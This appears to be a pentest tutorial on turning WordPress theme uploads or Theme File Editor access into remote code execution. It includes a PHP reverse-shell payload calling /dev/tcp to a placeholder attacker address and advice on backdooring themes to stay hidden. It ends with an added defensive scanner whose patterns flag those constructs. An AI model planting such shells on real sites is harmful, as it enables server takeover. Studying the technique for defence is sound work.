Malicious Theme
Uploading a Malicious Theme
WordPress Theme Exploitation (File Upload to RCE)
Another common attack vector in WordPress is the installation of a malicious theme. Like plugins, themes allow the execution of arbitrary PHP code. If an attacker can upload a theme that contains a web shell or reverse shell payload, this leads to full Remote Code Execution (RCE).
Theme Acquisition
The attacker prepares or downloads a malicious theme.
This theme can be a modified version of an existing theme.
Example: Injecting a reverse shell into functions.php or creating a shell.php inside the theme folder.
Payload example (reverse shell in functions.php):
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/[ip-vm]/[port] 0>&1'");
?>
Upload & Execute Payload
Existing theme
Update theme functions.php:
Navigate to the WordPress admin panel.
Dashboard > Tools > Theme File Editor

On the right side you can find the functions.php file

Choose your shell type (cmd / reverse shell)
Option 1: Upload a PHP reverse shell
Option 2: Upload a PHP cmd shell
Browse to the location of functions.php

💡 Please note:
It does not have to be in functions.php; it can be in any .php file. Before modifying the theme, make sure to visit the page you want to edit; otherwise, the shell won't be triggered.
💡 Please note:
You can use my theme from this repository; it is cmd-shell based.
If you want to modify it, just download the zip file and instead of this line (change it to this file)
New theme
Upload new theme:
Navigate to the WordPress admin panel.
Dashboard > Appearance > Themes > Add Theme

Click on
Upload Theme > Choose the file > Activate

Open the main page of the site

Modify the URL with your command

Key Point
Exploiting themes is more stealthy than plugins since themes are expected to modify site behavior and contain arbitrary PHP code.
Attackers may backdoor an existing theme rather than upload a new one to stay hidden.
Theme PHP files (e.g., functions.php, header.php, footer.php) are executed by WordPress when the theme renders a page, so malicious code runs as soon as the theme is activated.
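As an added defensive example (not part of this page or the author's repository), a small Python scanner that walks a theme directory and flags the constructs this page relies on: shell-spawning calls such as exec() and the /dev/tcp reverse-shell idiom. The sample theme files are constructed inline and the pattern list is an illustrative assumption, not an exhaustive signature set.

```python
import os
import re
import tempfile

# Patterns a defender would flag in theme PHP (illustrative, not exhaustive):
# shell-spawning functions, the bash /dev/tcp reverse-shell idiom, request
# parameters (typical of a cmd shell), and eval/decode obfuscation.
SUSPICIOUS_PATTERNS = {
    "shell_exec_call": re.compile(r"\b(exec|shell_exec|system|passthru|proc_open|popen)\s*\(", re.I),
    "dev_tcp_reverse_shell": re.compile(r"/dev/tcp/"),
    "request_param_use": re.compile(r"\$_(GET|POST|REQUEST)\s*\[", re.I),
    "eval_or_decode": re.compile(r"\b(eval|base64_decode|assert)\s*\(", re.I),
}

def scan_theme_dir(theme_dir):
    """Walk a theme directory; return (relative path, line number, pattern name) per hit."""
    findings = []
    for root, _dirs, files in os.walk(theme_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, start=1):
                    for label, pattern in SUSPICIOUS_PATTERNS.items():
                        if pattern.search(line):
                            findings.append((os.path.relpath(path, theme_dir), lineno, label))
    return findings

# Constructed sample theme: a benign header.php and a backdoored functions.php
# carrying the payload shape from the page (address left as a placeholder).
SAMPLE_THEME = {
    "header.php": "<?php wp_head(); ?>\n<header><?php bloginfo('name'); ?></header>\n",
    "functions.php": (
        "<?php\n"
        "add_theme_support('title-tag');\n"
        "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/[ip-vm]/[port] 0>&1'\");\n"
    ),
}

def demo():
    """Write the constructed theme to a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLE_THEME.items():
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_theme_dir(tmp)

if __name__ == "__main__":
    for path, lineno, label in demo():
        print(f"{path}:{lineno}: {label}")
```

Point scan_theme_dir() at wp-content/themes/<theme> on a server you administer; pairing it with DISALLOW_FILE_EDIT in wp-config.php removes the Theme File Editor used in the steps above.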